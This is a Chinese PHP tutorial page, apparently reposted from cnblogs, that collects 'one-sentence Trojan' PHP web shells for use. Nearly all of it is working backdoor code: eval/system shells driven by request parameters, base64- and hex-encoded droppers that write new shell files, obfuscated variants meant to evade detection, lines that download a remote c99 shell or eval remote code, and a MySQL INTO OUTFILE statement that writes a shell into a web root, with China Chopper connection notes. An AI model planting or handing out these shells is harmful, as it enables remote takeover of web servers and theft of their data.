Home > Backend Development > PHP Tutorial > PHP one-sentence Trojan summary and SQL statement to write one-sentence Trojan

PHP one-sentence Trojan summary and SQL statement to write one-sentence Trojan

藏色散人
Release: 2023-04-07 14:42:01
forward
4338 people have browsed it

1. A word about the basic class - the function is limited to verification vulnerabilities, which are very easy to detect in practice:

<?php @eval($_GET["code"])?>
<?php @system($_POST["cmd"])?>
Copy after login

2. Type of encoding replacement:

<?php @fputs(fopen(base64_decode(&#39;bG9zdC5waHA=&#39;),w),base64_decode(&#39;PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==&#39;));?>
//会生成<?php @eval($_POST[&#39;lostwolf&#39;]);?>

<script language="php">@fputs(fopen(base64_decode(&#39;bG9zdC5waHA=&#39;),w),base64_decode(&#39;PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==&#39;));</script>
//php在html内部的一种嵌入方式

<?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?>


<?php
session_start();
$_POST[&#39;code&#39;] && $_SESSION[&#39;theCode&#39;] = trim($_POST[&#39;code&#39;]);
$_SESSION[&#39;theCode&#39;]&&preg_replace(&#39;\&#39;a\&#39;eis&#39;,&#39;e&#39;.&#39;v&#39;.&#39;a&#39;.&#39;l&#39;.&#39;(base64_decode($_SESSION[\&#39;theCode\&#39;]))&#39;,&#39;a&#39;);?>
Copy after login

3. Other types:

<?php $_GET[a]($_GET[b]);?>
//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
<?php assert($_REQUEST["pass"]);?>     //菜刀连接 躲避检测 密码pass 
<?php substr(md5($_REQUEST[&#39;x&#39;]),28)==&#39;acd0&#39;&&eval($_REQUEST[&#39;pass&#39;]);?>
//菜刀提交  http://192.168.1.5/x.php?x=lostwolf  脚本类型:php  密码为 pass
Copy after login

4. Download type:

<?php echo copy("http://www.r57.me/c99.txt","lostwolf.php"); ?> 
<? echo file_get_contents("..//cfg_database.php");?> //显示某文件
<? eval ( file_get_contents("远程shell")) ?> //运行远程shell
Copy after login

5. No key function type:

<?php
$_="";
$_[+""]=&#39;&#39;;
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php ${&#39;_&#39;.$_}[&#39;_&#39;](${&#39;_&#39;.$_}[&#39;__&#39;]);?>
http://site/2.php?_=assert&__=eval($_POST[&#39;pass&#39;]) 密码是pass
<?$_="";$_[+""]=&#39;_&#39;;$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>
Copy after login

6. Supplementary knowledge points:

Write a sentence in SQL (MySQL):

select "<?php @system($_POST["pass"]);?>" into outfile "/home/webaccount/projectname/www/*.php"
#前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以
Copy after login

For more PHP related knowledge, please visit PHP Chinese website!

The above is the detailed content of PHP one-sentence Trojan summary and SQL statement to write one-sentence Trojan. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
php
source:cnblogs.com
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template